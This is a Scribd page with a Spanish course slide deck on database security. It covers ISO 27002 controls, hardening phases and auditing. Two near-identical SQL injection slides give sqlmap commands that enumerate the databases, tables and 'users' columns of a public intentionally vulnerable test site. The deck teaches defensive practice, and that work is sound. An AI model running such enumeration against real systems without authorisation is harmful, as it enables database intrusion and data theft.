Scribd Logo
Importer

Bienvenue sur Scribd !

  • Modulo III Seguridad en Bases de Datos 004

    Transféré par

    sociologia Suarez
    14 vues25 pages
    bd s.i

    Copyright

    © © All Rights Reserved

    Formats disponibles

    PDF, TXT ou lisez en ligne sur Scribd

    Avez-vous trouvé ce document utile ?

    Ce contenu est-il inapproprié ?

    Signaler ce document
    bd s.i

    Droits d'auteur :

    © All Rights Reserved
    Téléchargez comme PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    14 vues25 pages

    Modulo III Seguridad en Bases de Datos 004

    Transféré par

    sociologia Suarez
    bd s.i

    Droits d'auteur :

    © All Rights Reserved
    Téléchargez comme PDF, TXT ou lisez en ligne sur Scribd
    Signaler comme contenu inapproprié
    sur 25

    Seguridad en

    bases de datos
    Bases de Datos

    Una base de datos es una


    colección de datos
    almacenados de una
    manera ordenada y
    coherente.

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Tipos de bases de datos

    • Relacional (RDBMS)
    • Orientada a Objetos
    (ODBMS)
    • NoSQL

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Seguridad en bases de Datos
    La gran mayoría de los datos
    sensibles del mundo están
    almacenados en sistemas
    gestores de bases de datos
    comerciales tales como Oracle,
    Microsoft SQL Server entre
    otros, y atacar una base de
    datos es uno de los objetivos
    favoritos para los criminales.

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    ¿Cómo se gestiona una base de
    datos?
    • Un sistema de gestión de bases
    de datos (DBMS) está formado
    por un conjunto de programas
    que se utilizan
    para manejar grandes conjuntos
    de datos estructurados con
    funciones de
    consulta especiales para
    diferentes tipos de usuarios.

    • Los DBMS también controlan los


    parámetros de seguridad de la
    base de datos.

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Seguridad Informática
    • Garantizar condiciones y características de
    datos e información
    – Confidencialidad
    – Integridad
    – Disponibilidad

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    ISO 27001-27002
    •ISO/IEC 27001 – Estándar para el establecimiento,
    implementación, control y mejora de un SGSI (sistema
    de gestión de seguridad de la información), basado en
    el British Standard BS 7799 Parte 2.

    •ISO/IEC 27002 - Es una guía para proveer las mejores


    prácticas dentro de un SGSI. Anteriormente era
    conocido como ISO 17799 y está basado en British
    Standard BS 7799 Parte 1.

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Objetivos de Control – Controles de
    Referencia ISO27002:2013

    • 5 Políticas de la Seguridad de la
    Información.
    • 6.1.1 Roles y Responsabilidades
    para la seguridad de la
    información.
    • 6.1.2 Separación de deberes.

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Objetivos de Control – Controles de
    Referencia ISO27002:2013 (2)
    • 9. Control de Acceso
    • 9.2. Gestión de acceso de
    usuarios.
    – Registro de usuarios
    – Gestión de derechos de acceso
    – Retiro o ajuste de los derechos
    de trabajo.
    • 9.3 Responsabilidades de los
    usuarios
    – Uso Apropiado del acceso.

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Objetivos de Control – Controles de
    Referencia ISO27002:2013 (3)
    • 11. Seguridad Física
    y del Entorno
    – Perimetros de
    Seguridad
    – Control de acceso
    fisico.

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Objetivos de Control – Controles de
    Referencia ISO27002:2013 (4)
    • 12 Seguridad en Operaciones
    – Copias de Respaldo
    – Registro y seguimiento
    – Gestión de Vulnerabilidades técnicas
    • 13 Seguridad de las comunicaciones
    – Separación de redes.
    – Transferencia de Información.

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Objetivos de Control – Controles de
    Referencia ISO27002:2013 (5)

    • 17. Continuidad de Negocio


    – Redundancias
    - BPC
    - DRP

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Acciones a Emprender

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Asegurar la base de datos
    • Fases
    • Actividades
    • Responsables
    • Informes

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Primera Fase
    • Implemente estrategias de copias de
    seguridad y recuperación.
    • Eliminar contraseñas por defecto
    • Usar contraseñas complejas
    • Ajustar los permisos de acceso al software
    • Proteger los programas fuente
    • Limitar los accesos de usuarios
    administradores
    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Segunda Fase
    • Limitar accesos por sistema operativo
    • Asignar cuotas de espacio
    • Depurar los accesos de los usuarios
    • Habilitar auditoria para cuentas de
    administración
    • Monitorear los accesos de administración

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Tercera Fase
    • Eliminar contraseñas de archivos
    • Crear perfiles para los usuarios de la base de
    datos
    • Bloquear objetos no usados
    • Analizar los perfiles de los usuarios
    • Análisis y Limpieza periódica de logs.

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Cuarta Fase
    • Profundice la Auditoria
    • Identifique información sensible
    • Cifre la información sensible
    • Cifre las copias de seguridad

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Algunas Vulnerabilidades en bases de
    Datos
    • https://cve.mitre.org/
    • http://www.oracle.com
    /technetwork/topics/se
    curity/alerts-
    086861.html
    • https://technet.microso
    ft.com/es-
    es/security/bulletin/dn
    602597.aspx

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Conceptos de Auditoria de Bases de
    datos
    • Es el proceso que
    permite medir, asegurar,
    demostrar, monitorear y
    registrar los
    accesos a la información
    almacenada en las bases
    de

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Que auditamos
    • Quién accede a los datos
    • Cuándo se accedió a los
    datos
    • Desde qué tipo de
    dispositivo/aplicacióon
    • Desde que ubicacioón en
    la Red
    • Cuál fue la sentencia SQL
    ejecutada
    • Cuál fue el efecto del
    acceso

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Sql Inyection

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Sql Inyection (2)
    • Identificar Bases de datos
    – sqlmap -
    u http://testphp.vulnweb.com/listproducts.php?cat=1 –
    dbs
    • Identificar tablas
    – sqlmap -
    u http://testphp.vulnweb.com/listproducts.php?cat=1 -D
    acuart –tables
    • Ver columnas
    – sqlmap -
    u http://testphp.vulnweb.com/listproducts.php?cat=1 -D
    acuart -T users –columns

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Sql Inyection (3)
    • Identificar Bases de datos
    – sqlmap -
    u http://testphp.vulnweb.com/listproducts.php?cat=1 –
    dbs
    • Identificar tablas
    – sqlmap -
    u http://testphp.vulnweb.com/listproducts.php?cat=1 -D
    acuart –tables
    • Ver columnas
    – sqlmap -
    u http://testphp.vulnweb.com/listproducts.php?cat=1 -D
    acuart -T users –columns

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright
    Gracias!

    Diplomado en Seguridad de la Información Carlos Hernando Vargas Beltrán / Julián Jiménez Agudelo
    Seguridad en Bases de Datos y aplicaciones Todos los derechos reservados - Copyright

    Vous aimerez peut-être aussi